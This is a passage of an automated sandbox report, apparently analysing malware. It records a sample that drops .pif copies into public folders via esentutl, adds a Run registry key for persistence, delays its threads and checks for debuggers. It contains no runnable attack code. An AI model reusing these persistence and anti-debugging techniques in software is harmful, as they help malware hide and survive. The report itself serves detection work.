            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B16782 push 02B167C6h; ret 0_2_02B167BE
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B16784 push 02B167C6h; ret 0_2_02B167BE
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1D5A0 push 02B1D5CCh; ret 0_2_02B1D5C4
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3C570 push 02B3C56Eh; ret 0_2_02B3C566
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C56C push ecx; mov dword ptr [esp], edx0_2_02B1C571
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2AAE0 push 02B2AB18h; ret 0_2_02B2AB10
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28AD8 push 02B28B10h; ret 0_2_02B28B08
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2AADF push 02B2AB18h; ret 0_2_02B2AB10
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B84A50 push eax; ret 0_2_02B84B20
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1CBEC push 02B1CD72h; ret 0_2_02B1CD6A
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2886C push 02B288AEh; ret 0_2_02B288A6
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C98E push 02B1CD72h; ret 0_2_02B1CD6A
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2790C push 02B27989h; ret 0_2_02B27981
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B26946 push 02B269F3h; ret 0_2_02B269EB
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B26948 push 02B269F3h; ret 0_2_02B269EB
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B25E7C push ecx; mov dword ptr [esp], edx0_2_02B25E7E
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B22F60 push 02B22FD6h; ret 0_2_02B22FCE
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0041C40C push cs; iretd 14_2_0041C4E2
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00423149 push eax; ret 14_2_00423179
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeFile created: C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pif
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Cobsfhiy.PIF
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pif

            Boot Survival

            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pif
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pif
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cobsfhiy
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B2AB1C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 24170000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 26060000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 25E10000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 343D0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 34950000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 345F0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 28410000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 28910000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 286C0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599766
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599656
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599547
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599437
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599328
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599219
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599109
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598974
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598844
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598734
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598625
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598516
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598297
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598188
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598063
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597953
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597844
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597719
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596246
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596016
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595891
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595781
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595672
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595563
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595438
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595313
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595203
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595094
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594969
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594750
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594641
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594531
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594422
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594313
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599766
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599641
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599516
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599297
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599188
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599063
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598938
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598828
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598719
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598594
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595622
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595500
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595391
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595266
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595156
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595047
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594936
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594828
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594688
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594559
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594452
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594344
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594234
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599874
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599756
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599625
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599515
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599296
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599187
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599078
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598968
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598749
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598635
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598515
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598296
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598187
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598078
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597968
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597749
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597640
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597531
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597421
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597312
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597203
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597093
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596984
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596765
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596656
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596546
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596437
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596328
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596218
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596109
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595999
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595890
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595780
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595671
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595562
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595453
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595343
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595234
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595015
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594906
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594796
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594686
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594578
            Source: C:\Users\Public\Libraries\yihfsboC.pif Window / User API: threadDelayed 8892
            Source: C:\Users\Public\Libraries\yihfsboC.pif Window / User API: threadDelayed 949
            Source: C:\Users\Public\Libraries\yihfsboC.pif Window / User API: threadDelayed 8184
            Source: C:\Users\Public\Libraries\yihfsboC.pif Window / User API: threadDelayed 1643
            Source: C:\Users\Public\Libraries\yihfsboC.pif Window / User API: threadDelayed 7560
            Source: C:\Users\Public\Libraries\yihfsboC.pif Window / User API: threadDelayed 2292
            Source: C:\Users\Public\alpha.pif API coverage: 6.2 %
            Source: C:\Users\Public\alpha.pif API coverage: 7.9 %
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF API coverage: 9.5 %
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\Public\xpha.pif Last function: Thread delayed
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B15908
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_003A0207
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_003A589A
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose,16_2_003B3E66
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_003A4EC1
            Source: C:\Users\Public\alpha.pif Code function: 16_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_0039532E
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,19_2_003A589A
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,19_2_003A0207
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose,19_2_003B3E66
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,19_2_003A4EC1
            Source: C:\Users\Public\alpha.pif Code function: 19_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,19_2_0039532E
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd155c28fa062f<
            Source: Cobsfhiy.PIF, 00000018.00000002.1551396300.0000000000828000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWNi
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1353822380.000000000076E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: yihfsboC.pif, 0000000E.00000002.2534862265.000000002423F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: xpha.pif, 00000014.00000002.1533592941.0000000002690000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: Cobsfhiy.PIF, 00000015.00000002.1462267531.000000000072D000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2538244625.0000000032815000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2529660851.00000000268E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe API call chain: ExitProcess graph end node graph_0-38021
            Source: C:\Users\Public\Libraries\yihfsboC.pif API call chain: ExitProcess graph end node graph_14-54639
            Source: C:\Users\Public\Libraries\yihfsboC.pif API call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF API call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\yihfsboC.pif Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B2F744
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Process queried: DebugPort
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Process queried: DebugPort
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_28DFE660 LdrInitializeThunk,LdrInitializeThunk,14_2_28DFE660
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CE09
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B2894C
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003BC1FA mov eax, dword ptr fs:[00000030h] 16_2_003BC1FA
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003BC1FA mov eax, dword ptr fs:[00000030h] 19_2_003BC1FA
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_0040ADB0 GetProcessHeap,HeapFree,14_2_0040ADB0
            Source: C:\Users\Public\Libraries\yihfsboC.pif Process token adjusted: Debug
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040E61C
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00416F6A
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_004123F1 SetUnhandledExceptionFilter,14_2_004123F1
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A6EC0 SetUnhandledExceptionFilter,16_2_003A6EC0
            Source: C:\Users\Public\alpha.pif Code function: 16_2_003A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_003A6B40
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A6EC0 SetUnhandledExceptionFilter,19_2_003A6EC0
            Source: C:\Users\Public\alpha.pif Code function: 19_2_003A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_003A6B40
            Source: C:\Users\Public\xpha.pif Code function: 20_2_00383600 SetUnhandledExceptionFilter,20_2_00383600
            Source: C:\Users\Public\xpha.pif Code function: 20_2_00383470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00383470
